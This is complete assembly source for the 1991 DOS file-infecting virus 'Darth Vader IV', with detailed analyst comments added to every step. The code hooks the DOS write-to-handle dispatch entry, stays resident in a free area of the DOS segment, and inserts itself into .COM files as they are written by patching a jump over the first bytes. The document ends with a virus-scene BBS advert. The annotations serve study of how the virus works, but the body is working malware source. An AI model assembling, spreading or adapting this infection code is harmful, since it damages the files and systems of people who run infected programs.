;******************************************************************************
;*                                                                            *
;*                        D A R T H   V A D E R   IV                          *
;*                                                                            *
;*          (C) - Copyright 1991 by Waleri Todorov, CICTT-Sofia               *
;*                          All Rights Reserved                               *
;*                                                                            *
;*                      Enchanced by: Lazy Wizard                             *
;*                                                                            *
;*                         Turbo Assembler 2.0                                *
;*                                                                            *
;******************************************************************************
;
; ---------------------------------------------------------------------------
; Analyst notes (added on review; every instruction below is left unchanged).
; Syntax: TASM/MASM (.model tiny, .code, end Start), 16-bit real mode, .COM.
;
; What the visible code does, in order:
;   1. Start: saves AX, takes the segment stored in the INT 2Bh vector, and
;      searches that segment for a run of zero bytes at least as long as the
;      whole body (Start..LastByte).  No run -> just run the host.
;   2. Scans the same segment byte by byte for the opcode bytes 2E 8B 9F
;      (`mov bx,cs:[bx+disp16]`) and reads the disp16 that follows as a
;      table address.  The word at table+80h is exchanged with the resident
;      address of `Handle`, and the old value is turned into the rel16 of
;      the `jmp` at OldWrite so Handle can chain to it.  80h = 40h*2 and the
;      chain target is named OldWrite, so this is presumably the DOS INT 21h
;      dispatch slot for AH=40h (write to handle); the table layout itself
;      is not visible here -- inference, not fact.
;   3. Copies the body into the zero run (rep movsb), then restores the
;      host's original first three bytes (kept in First3) at offset 100h and
;      jumps there.
;   4. Handle (the resident part) looks at each intercepted call with a count
;      of 256 or more, asks DOS for the file's SFT entry, and -- if the SFT
;      name bytes at +29h read "OM" and the low word at +15h is zero -- writes
;      the body into a zero run inside the caller's buffer and replaces the
;      buffer's first three bytes with a JMP to it, before chaining on.  The
;      write the host was about to perform then carries the infected image.
;
; Encoding-sensitive: every address is computed from label differences
; relative to a runtime base (bx = First3 in the installer, bp = NextHandle
; in the resident part), `db 26h` / `db 36h` are hand-emitted segment
; override prefixes, and `org $-1` makes one instruction overlap the one
; before it.  Changing any instruction's size or order breaks the arithmetic,
; which is why this file is annotated rather than restyled.
;
; INT 2Fh AX=1220h / AX=1216h and the SFT offsets 15h / 29h are DOS internal
; interfaces; the meanings given below come from DOS internals references
; (RBIL), not from anything in this file, and should be read as such.
; ---------------------------------------------------------------------------

.model tiny
.code

org 100h                                ; .COM image: code starts at CS:100h

; ---------------------------------------------------------------------------
; Start -- installer, executed when an infected .COM is run.
; On entry (DOS .COM convention) CS=DS=ES=SS=PSP segment.
; ---------------------------------------------------------------------------
Start:
call NextLine                           ; pushes the offset of First3; used as
                                        ; the position-independent base (bx)
; The three bytes below are the host's original first three bytes.  In the
; dropper (generation zero) they are `int 20h` (CD 20) + `int 3` (CC): DOS
; terminate, so running the bare sample only installs and exits.
First3:
int 20h
int 3

NextLine:
pop bx                                  ; bx = offset of First3 (= Start+3)
push ax                                 ; AX is handed back to the host untouched
xor di,di
mov es,di                               ; es = 0 -> interrupt vector table
mov es,es:[2Bh*4+2]                     ; es = segment word of the INT 2Bh vector.
                                        ; INT 2Bh is a reserved DOS interrupt;
                                        ; presumably this lands in the DOS kernel
                                        ; segment, which is where the resident
                                        ; copy will live -- TODO confirm per version
mov cx,1000h                            ; try up to 1000h start offsets
call SearchZero                         ; di = start of a zero run >= body size
jc ReturnControl                        ; none found: give up, run the host
xchg ax,si                              ; ax was 0 after SearchZero -> si = 0
inc si                                  ; pre-increment; loop below nets +1/iter

; Scan es:0 upward, one byte at a time, for 2E 8B (CS-override MOV r16,r/m16).
; NOTE(review): there is no bound on this loop -- if the pattern is absent the
; scan wraps at 64K and repeats forever.
SearchTable:
dec si                                  ; undo the +2 of lodsw, net step = 1 byte
db 26h                                  ; ES: prefix for the lodsw that follows
lodsw                                   ; ax = es:[si]; si += 2
cmp ax,8B2Eh                            ; little-endian for bytes 2E 8B
jne SearchTable
db 26h                                  ; ES: prefix for the lodsb that follows
lodsb                                   ; al = ModR/M byte after 2E 8B; si += 1
cmp al,75h                              ; 2E 8B 75 = mov si,cs:[di+disp8]: if this
je ReturnControl                        ; shows up first, refuse to install
                                        ; (presumably a DOS-version signature;
                                        ; cannot be confirmed from this file)
cmp al,9Fh                              ; 2E 8B 9F = mov bx,cs:[bx+disp16]
jne SearchTable
mov si,es:[si]                          ; si = the disp16 = table base the kernel
                                        ; indexes with bx
mov cx,LastByte-Start                   ; cx = body length in bytes
lea ax,[di+Handle-Start]                ; ax = resident address of Handle
                                        ; (di = start of the zero run)
org $-1                                 ; overlap: the next instruction's first
                                        ; byte (26h, ES prefix) replaces the last
                                        ; byte of the lea.
                                        ; NOTE(review): with the displacement
                                        ; sizes TASM 2.0 emits (16-bit for this
                                        ; forward reference unless /m is used)
                                        ; that byte is part of the lea's
                                        ; displacement; this review could not
                                        ; confirm that the overlapped encoding
                                        ; still yields the Handle address.  It is
                                        ; either an anti-disassembly trick or a
                                        ; latent bug -- verify on the assembled
                                        ; bytes before drawing conclusions.
xchg ax,es:[si+80h]                     ; table[80h] <- Handle; ax <- old entry
                                        ; (80h = 2*40h: presumably INT 21h/AH=40h)
sub ax,di
sub ax,cx                               ; ax = old - (di+cx) = rel16 from the end
                                        ; of the `jmp` at OldWrite to the old entry
mov [bx+OldWrite-Start-2],ax            ; bx+OldWrite-Start-2 = OldWrite+1: patch
                                        ; the jmp's rel16 in this (PSP) image
mov word ptr [bx+NewStart+1-Start-3],di ; NewStart+1 = imm16 of `mov si,0`: the
                                        ; resident part learns its own offset
lea si,[bx-3]                           ; si = Start (patched image, ds = PSP)
rep movsb                               ; copy cx bytes to es:di (the zero run)

; ---------------------------------------------------------------------------
; ReturnControl -- hand over to the host: put its original three bytes back
; at 100h and jump there.  Reached on both the success and the give-up paths.
; ---------------------------------------------------------------------------
ReturnControl:
pop ax                                  ; restore host's AX
push ss
pop es                                  ; es = ss = PSP segment (.COM: all equal)
mov di,100h                             ; destination: host entry point
lea si,[bx+First3-Start-3]              ; = First3 (bx = Start+3)
push di                                 ; return address 100h for the ret below
movsw
movsb                                   ; 3 bytes: First3 -> cs:100h
ret                                     ; -> 100h, host runs with its own code

; ---------------------------------------------------------------------------
; SearchZero -- look for a run of zero words long enough to hold the body.
; In:  es:di = one byte before the first candidate start; cx = number of
;      candidate start offsets to try (advances one byte per try, so di may
;      end up odd).
; Out: CF=0 and es:di = start of the run, ax = 0, cx preserved; or CF=1 if no
;      run was found within cx tries.
; Used twice: by the installer on the DOS segment (cx = 1000h) and by Handle
; on the caller's write buffer (cx = the caller's write count).
; NOTE(review): each try compares (LastByte-Start-1)/2+1 words past the start
; offset, so the scan can read beyond the last of the cx candidate bytes --
; in Handle that means reading past the caller's buffer.
; ---------------------------------------------------------------------------
SearchZero:
xor ax,ax                               ; value to compare against: 0
inc di                                  ; next candidate start
push cx
push di
mov cx,(LastByte-Start-1)/2+1           ; words to check (>= body size in bytes)
repe scasw                              ; run while es:[di] == 0
pop di                                  ; pop does not touch flags: ZF still
pop cx                                  ; reflects the last scasw compare
je FoundPlace                           ; whole count matched -> found; CF=0 from
                                        ; the last cmp (0 - 0)
loop SearchZero                         ; otherwise try the next byte
stc                                     ; exhausted: CF=1
FoundPlace:
ret

; ---------------------------------------------------------------------------
; Handle -- resident hook installed into the dispatch table (see Start).
; Register contents are taken as the INT 21h caller's: bx = file handle,
; cx = byte count, ds:dx = buffer -- consistent with AH=40h but assumed, not
; shown by this file.  Everything it touches is saved/restored; on every path
; it ends by jumping to the original entry through OldWrite.
; ---------------------------------------------------------------------------
Handle:
push bp
call NextHandle
NextHandle:
pop bp                                  ; bp = resident offset of NextHandle
push es
push ax
push bx
push cx
push si
push di
test ch,ch                              ; writes shorter than 256 bytes are
je Do                                   ; passed through untouched
mov ax,1220h                            ; DOS internal (RBIL): INT 2Fh/1220h =
int 2Fh                                 ; get JFT entry for handle bx -> es:di
mov bl,es:[di]                          ; bl = system file table number
mov ax,1216h                            ; DOS internal (RBIL): INT 2Fh/1216h =
int 2Fh                                 ; get SFT entry for bl -> es:di
cmp es:[di+29h],'MO'                    ; word compare, little-endian -> bytes
jne Do                                  ; "OM": the last two extension chars
                                        ; (.COM, but .?OM would pass too)
cmp word ptr es:[di+15h],0              ; low word of the file position must be
jne Do                                  ; 0 (writing at the start of the file;
                                        ; high word is not checked)
push ds
pop es                                  ; es = caller's ds
mov di,dx                               ; es:di = caller's buffer
mov ax,[di]                             ; buffer[0..1]
mov [bp+First3-NextHandle],ax           ; keep the host's first 3 bytes in the
mov al,[di+2]                           ; resident copy's First3 so the new
mov [bp+First3+2-NextHandle],al         ; host can restore them at run time
call SearchZero                         ; zero run inside the buffer? (cx = count)
jc Do                                   ; none: leave the write alone
push di                                 ; di = offset of the run in the buffer
NewStart:
mov si,0                                ; imm16 is patched by the installer to
                                        ; the resident body's own offset
mov cx,(LastByte-Start-1)/2             ; words to copy; the last 1-2 bytes (the
                                        ; tail of the jmp at OldWrite) are left
                                        ; out -- the zero run already holds 0 there
                                        ; and the installer rewrites that rel16
cli                                     ; no interrupts while copying via ss:
rep
db 36h                                  ; SS: prefix -> rep ss:movsw
movsw                                   ; ss:si (resident body) -> es:di (buffer).
                                        ; NOTE(review): this assumes SS equals the
                                        ; segment the body was installed in at
                                        ; the time of the call -- TODO confirm
sti
mov di,dx                               ; back to the start of the buffer
mov al,0E9h                             ; JMP rel16 opcode
stosb
pop ax                                  ; ax = run offset
sub ax,di                               ; ax = run - (dx+1)
dec ax
dec ax                                  ; ax = run - (dx+3): rel16 for a 3-byte jmp
stosw                                   ; buffer now starts with `jmp run`
Do:
pop di
pop si
pop cx
pop bx
pop ax
pop es
pop bp
OldWrite:
jmp start                               ; rel16 is rewritten by the installer to
                                        ; reach the original table entry; `start`
                                        ; here is only a placeholder target

LastByte label byte                     ; end of the body (size = LastByte-Start)

end Start
; ═══════════════════════════════════════════════════════════════════════════
; ════════════════════> and Remember Don't Forget to Call <════════════════
; ════════════> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <══════════
; ═══════════════════════════════════════════════════════════════════════════
; (The rule characters in this trailer were lost to mis-encoding in the mirror;
;  they are rendered here as ═ -- the text between them is as archived.)